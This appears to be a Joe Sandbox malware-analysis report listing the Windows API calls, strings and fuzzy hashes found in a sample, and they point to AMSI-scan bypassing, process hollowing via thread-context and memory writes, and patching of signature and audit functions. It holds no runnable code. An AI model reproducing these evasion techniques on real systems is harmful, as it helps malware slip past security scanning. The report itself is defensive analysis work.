                      • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 028A876C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                      • String ID: DllGetClassObject$W$amsi
                      • API String ID: 941070894-2671292670
                      • Opcode ID: 0b7d4311054d3aaa2455a63f4782e71b09492b5c48065cfe2f9443b985fbaf94
                      • Instruction ID: e207ea14fedf3c77197d0b794a7fbea1f8695b68101352e7aacfb77423be8a36
                      • Opcode Fuzzy Hash: 0b7d4311054d3aaa2455a63f4782e71b09492b5c48065cfe2f9443b985fbaf94
                      • Instruction Fuzzy Hash: 32F0A45854C381B9F201E6788C55F4FBECD4B51224F048A08B1E8D62D2DA79D10497B7

                      Control-flow Graph

                      APIs
                      • Sleep.KERNEL32(00000000,?,?,00000000,02891FE4), ref: 02891B17
                      • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02891FE4), ref: 02891B31
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: Sleep
                      • String ID:
                      • API String ID: 3472027048-0
                      • Opcode ID: 97147427dcb6ff5da263e351d7d3eb4857b90631b72b5d34e37d3a1cb1cc8d11
                      • Instruction ID: 363c94973b6a6560944d6ff3b00fc83854ca92a004a8506a2b92ae0526eba0d4
                      • Opcode Fuzzy Hash: 97147427dcb6ff5da263e351d7d3eb4857b90631b72b5d34e37d3a1cb1cc8d11
                      • Instruction Fuzzy Hash: AA51ED7DA092428FDF16CF6CD988766BBD1AB45318F1C81AEE44CCB2C6E7708845CB91

                      Control-flow Graph

                      APIs
                      • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 028AE86A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: CheckConnectionInternet
                      • String ID: Initialize$OpenSession$ScanBuffer
                      • API String ID: 3847983778-3852638603
                      • Opcode ID: 94bf49c1ffdcf62f3068745c150f06fcd39a4cf22c36cfd1af21d46215984209
                      • Instruction ID: 3361fda33f7a66e295ec2761b6d9927a6fc0150791022f1a6ad65828bfe4ddad
                      • Opcode Fuzzy Hash: 94bf49c1ffdcf62f3068745c150f06fcd39a4cf22c36cfd1af21d46215984209
                      • Instruction Fuzzy Hash: 87410B7DA101089FFF11EBA8D8A0A9EB7FAEF48710F254831E401E7251DE74AD068F12

                      Control-flow Graph

                      APIs
                      • LoadLibraryA.KERNEL32(00000000,00000000,028A8903), ref: 028A8850
                      • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,028A8903), ref: 028A8860
                      • GetProcAddress.KERNEL32(74F60000,00000000), ref: 028A8879
                        • Part of subcall function 028A7CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 028A7D6C
                      • FreeLibrary.KERNEL32(74F60000,00000000,028F2388,Function_000065D8,00000004,028F2398,028F2388,000186A3,00000040,028F239C,74F60000,00000000,00000000,00000000,00000000,028A8903), ref: 028A88E3
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: Library$AddressFreeHandleLoadMemoryModuleProcVirtualWrite
                      • String ID:
                      • API String ID: 1543721669-0
                      • Opcode ID: ecac757a1945752b517761accb16dec411ac466b80926e3b641a7ea5855dcf2a
                      • Instruction ID: cdf397ae2dce380687a2fec7d9c43bf8af8fb085b50e9498c4503847ab8c00fd
                      • Opcode Fuzzy Hash: ecac757a1945752b517761accb16dec411ac466b80926e3b641a7ea5855dcf2a
                      • Instruction Fuzzy Hash: DA1172BDA40314AFFB40FBACCC21E5E77AAAB45700F5904247B04E77A4DA7499018B16

                      Control-flow Graph

                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: ClearVariant
                      • String ID:
                      • API String ID: 1473721057-0
                      • Opcode ID: 60654762a1bff688680370139f54ba262e40856f91edf6b141aaa93ee7ae7f2f
                      • Instruction ID: 662100631b47bb27b04330bf76a0600cc3550a2759f6f79513c2b56fb9a4b1df
                      • Opcode Fuzzy Hash: 60654762a1bff688680370139f54ba262e40856f91edf6b141aaa93ee7ae7f2f
                      • Instruction Fuzzy Hash: 5EF0AF3C708218C79F24FB2CCA846692B9A6F44B0874C5427B80EDB209CF259C05EB63

                      Control-flow Graph

                      APIs
                      • SysFreeString.OLEAUT32(?), ref: 028A735A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: FreeString
                      • String ID: H
                      • API String ID: 3341692771-2852464175
                      • Opcode ID: c9ce7f1f65f9f6b6a17f2b9e81e604279983ea119f57d9b839995fb296f8eaf5
                      • Instruction ID: 20fee8c721c1559e7f739bef521b8c061d5e3567dcb639bace30660e25293005
                      • Opcode Fuzzy Hash: c9ce7f1f65f9f6b6a17f2b9e81e604279983ea119f57d9b839995fb296f8eaf5
                      • Instruction Fuzzy Hash: E6B1C278A016089FEB14CF99D890A9DFBF6FF49314F258169E809EB364DB30A845DF50

                      Control-flow Graph

                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: InitVariant
                      • String ID:
                      • API String ID: 1927566239-0
                      • Opcode ID: cdcd9705e06fae1bbf42c4d90a1afd871648ba5eee4fd7014a7fb69f52e25e14
                      • Instruction ID: a0753a5e50b55488f1f206abea93bee6a3851957c0517084e13ecb74b48a93a4
                      • Opcode Fuzzy Hash: cdcd9705e06fae1bbf42c4d90a1afd871648ba5eee4fd7014a7fb69f52e25e14
                      • Instruction Fuzzy Hash: 50314F7D600608AFEF10DEACC884AAA7BE9FB0D304F4C4562F909D3644D335D990DB66
                      APIs
                      • CLSIDFromProgID.OLE32(00000000,?,00000000,028A6D39,?,?,?,00000000), ref: 028A6D19
                        • Part of subcall function 02894C0C: SysFreeString.OLEAUT32(028AED84), ref: 02894C1A
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: FreeFromProgString
                      • String ID:
                      • API String ID: 4225568880-0
                      • Opcode ID: 8187a34fb1d54c3152d60a1a6a0209ca449e91f06ef612c28999746ba220b50b
                      • Instruction ID: 501abf5cd32f7d0a518f19bf455d5a1ee5fe10818765ecdefe013635d15ba2dd
                      • Opcode Fuzzy Hash: 8187a34fb1d54c3152d60a1a6a0209ca449e91f06ef612c28999746ba220b50b
                      • Instruction Fuzzy Hash: F5E06D3D604318BFFF11EBADCC6295A77ADDB89B50B550471A801D7600EA76BE008862
                      APIs
                      • GetModuleFileNameA.KERNEL32(02890000,?,00000105), ref: 02895832
                        • Part of subcall function 02895A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02890000,028BE790), ref: 02895A94
                        • Part of subcall function 02895A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02890000,028BE790), ref: 02895AB2
                        • Part of subcall function 02895A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02890000,028BE790), ref: 02895AD0
                        • Part of subcall function 02895A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02895AEE
                        • Part of subcall function 02895A78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02895B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02895B37
                        • Part of subcall function 02895A78: RegQueryValueExA.ADVAPI32(?,02895CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02895B7D,?,80000001), ref: 02895B55
                        • Part of subcall function 02895A78: RegCloseKey.ADVAPI32(?,02895B84,00000000,?,?,00000000,02895B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02895B77
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: Open$FileModuleNameQueryValue$Close
                      • String ID:
                      • API String ID: 2796650324-0
                      • Opcode ID: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                      • Instruction ID: 1187b02bebef58a3e07a3556748aecd02f358a579b54c9c9e740b32b8a80e43f
                      • Opcode Fuzzy Hash: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                      • Instruction Fuzzy Hash: B8E06D79A002149FCF10DF5CC8C0A5737D8AB08750F480565EC58DF34AD374D9208BD1
                      APIs
                      • GetModuleFileNameA.KERNEL32(00000000,?,00000105,029E68C8,?,028B0032,ScanBuffer,028F237C,028BB40C,OpenSession,028F237C,028BB40C,ScanBuffer,028F237C,028BB40C,OpenSession), ref: 0289C2FB
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: FileModuleName
                      • String ID:
                      • API String ID: 514040917-0
                      • Opcode ID: f936b450ebeaddec630cccddfce7c9c97fc4af6cb00137120e14f29a7b95d2da
                      • Instruction ID: 66e3c2003e58be6e01d48c847ac95342f37aeefccd6b2e0359976fd045caf9d8
                      • Opcode Fuzzy Hash: f936b450ebeaddec630cccddfce7c9c97fc4af6cb00137120e14f29a7b95d2da
                      • Instruction Fuzzy Hash: 95D022BAB006242BE700E0AC1C818FB32CE8B8C760F4800317998CB3C1FA608E000BD3
                      APIs
                      • GetFileAttributesA.KERNEL32(00000000,?,028AFD00,ScanString,028F237C,028BB40C,OpenSession,028F237C,028BB40C,ScanString,028F237C,028BB40C,UacScan,028F237C,028BB40C,UacInitialize), ref: 02897E1B
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: AttributesFile
                      • String ID:
                      APIs
                      • SysFreeString.OLEAUT32(028AED84), ref: 02894C1A
                      • SysReAllocStringLen.OLEAUT32(028BC2B4,028AED84,000000B4), ref: 02894C62
                      Similarity
                      • API ID: String$AllocFree
                      • String ID:
                      APIs
                      • timeSetEvent.WINMM(00002710,00000000,028BBF78,00000000,00000001), ref: 028BBF94
                      Similarity
                      • API ID: Eventtime
                      • String ID:
                      APIs
                      • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02891A03,?,02891FC1), ref: 028915E2
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      APIs
                      • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02891FC1), ref: 028916A4
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      APIs
                      • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02891FE4), ref: 02891704
                      Similarity
                      • API ID: FreeVirtual
                      • String ID:
                      APIs
                      • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,028AABDB,?,?,028AAC6D,00000000,028AAD49), ref: 028AA968
                      • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 028AA980
                      • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 028AA992
                      • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 028AA9A4
                      • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 028AA9B6
                      • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 028AA9C8
                      • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 028AA9DA
                      • GetProcAddress.KERNEL32(00000000,Process32First), ref: 028AA9EC
                      • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 028AA9FE
                      • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 028AAA10
                      • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 028AAA22
                      • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 028AAA34
                      • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 028AAA46
                      • GetProcAddress.KERNEL32(00000000,Module32First), ref: 028AAA58
                      • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 028AAA6A
                      • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 028AAA7C
                      • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 028AAA8E
                      Strings
                      Similarity
                      • API ID: AddressProc$HandleModule
                      • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                      APIs
                        • Part of subcall function 028A881C: LoadLibraryA.KERNEL32(00000000,00000000,028A8903), ref: 028A8850
                        • Part of subcall function 028A881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,028A8903), ref: 028A8860
                        • Part of subcall function 028A881C: GetProcAddress.KERNEL32(74F60000,00000000), ref: 028A8879
                        • Part of subcall function 028A881C: FreeLibrary.KERNEL32(74F60000,00000000,028F2388,Function_000065D8,00000004,028F2398,028F2388,000186A3,00000040,028F239C,74F60000,00000000,00000000,00000000,00000000,028A8903), ref: 028A88E3
                      • GetThreadContext.KERNEL32(00000000,028F2420,ScanString,028F23A4,028AA774,UacInitialize,028F23A4,028AA774,ScanBuffer,028F23A4,028AA774,ScanBuffer,028F23A4,028AA774,UacInitialize,028F23A4), ref: 028A943A
                        • Part of subcall function 028A7CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 028A7D6C
                      • SetThreadContext.KERNEL32(00000000,028F2420,ScanBuffer,028F23A4,028AA774,ScanString,028F23A4,028AA774,Initialize,028F23A4,028AA774,00000000,-00000008,028F24F8,00000004,028F24FC), ref: 028AA14F
                      • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,028F2420,ScanBuffer,028F23A4,028AA774,ScanString,028F23A4,028AA774,Initialize,028F23A4,028AA774,00000000,-00000008,028F24F8), ref: 028AA15C
                        • Part of subcall function 028A8798: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,028F23A4,028AA3BF,ScanString,028F23A4,028AA774,ScanBuffer,028F23A4,028AA774,Initialize,028F23A4,028AA774,UacScan), ref: 028A87AC
                        • Part of subcall function 028A8798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 028A87C6
                        • Part of subcall function 028A8798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,028F23A4,028AA3BF,ScanString,028F23A4,028AA774,ScanBuffer,028F23A4,028AA774,Initialize), ref: 028A8802
                      Strings
                      Similarity
                      • API ID: Library$Thread$AddressContextFreeLoadProc$HandleMemoryModuleResumeVirtualWrite
                      • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                      APIs
                        • Part of subcall function 028A881C: LoadLibraryA.KERNEL32(00000000,00000000,028A8903), ref: 028A8850
                        • Part of subcall function 028A881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,028A8903), ref: 028A8860
                        • Part of subcall function 028A881C: GetProcAddress.KERNEL32(74F60000,00000000), ref: 028A8879
                        • Part of subcall function 028A881C: FreeLibrary.KERNEL32(74F60000,00000000,028F2388,Function_000065D8,00000004,028F2398,028F2388,000186A3,00000040,028F239C,74F60000,00000000,00000000,00000000,00000000,028A8903), ref: 028A88E3
                      • GetThreadContext.KERNEL32(00000000,028F2420,ScanString,028F23A4,028AA774,UacInitialize,028F23A4,028AA774,ScanBuffer,028F23A4,028AA774,ScanBuffer,028F23A4,028AA774,UacInitialize,028F23A4), ref: 028A943A
                      Strings
                      Similarity
                      • API ID: Library$AddressContextFreeHandleLoadModuleProcThread
                      • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                      APIs
                      • GetModuleHandleA.KERNEL32(kernel32.dll,02896BC8,02890000,028BE790), ref: 028958D1
                      • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 028958E8
                      • lstrcpynA.KERNEL32(?,?,?), ref: 02895918
                      • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02896BC8,02890000,028BE790), ref: 0289597C
                      • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02896BC8,02890000,028BE790), ref: 028959B2
                      • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02896BC8,02890000,028BE790), ref: 028959C5
                      • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02896BC8,02890000,028BE790), ref: 028959D7
                      • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02896BC8,02890000,028BE790), ref: 028959E3
                      • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02896BC8,02890000), ref: 02895A17
                      • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02896BC8), ref: 02895A23
                      • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02895A45
                      Strings
                      Similarity
                      • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                      • String ID: GetLongPathNameA$\$kernel32.dll
                      APIs
                      • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02895B94
                      • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02895BA1
                      • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02895BA7
                      • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02895BD2
                      • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02895C19
                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02895C29
                      • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02895C51
                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02895C61
                      • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02895C87
                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02895C97
                      Strings
                      Similarity
                      • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                      • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                      APIs
                      • LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,028F23A4,028AA3BF,ScanString,028F23A4,028AA774,ScanBuffer,028F23A4,028AA774,Initialize,028F23A4,028AA774,UacScan), ref: 028A87AC
                      • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 028A87C6
                      • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,028F23A4,028AA3BF,ScanString,028F23A4,028AA774,ScanBuffer,028F23A4,028AA774,Initialize), ref: 028A8802
                        • Part of subcall function 028A7CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 028A7D6C
                      Strings
                      Similarity
                      • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                      • String ID: BCryptVerifySignature$bcrypt
                      APIs
                        • Part of subcall function 02894ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02894EDA
                      • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,028ADFD2), ref: 028ADF3F
                      • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 028ADF79
                      • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 028ADFA6
                      • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 028ADFAF
                      Similarity
                      • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                      • String ID:
                      APIs
                      • RtlInitUnicodeString.NTDLL(?,?), ref: 028ADEA0
                      • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,028ADEF2), ref: 028ADEB6
                      • NtDeleteFile.NTDLL(?), ref: 028ADED5
                      Similarity
                      • API ID: Path$DeleteFileInitNameName_StringUnicode
                      • String ID:
                      • API String ID: 1459852867-0
                      • Opcode ID: 04bcbcdbf97a37c569b4dc7d71b775fc47ae6acb87d6c073bc15c153bbad84ce
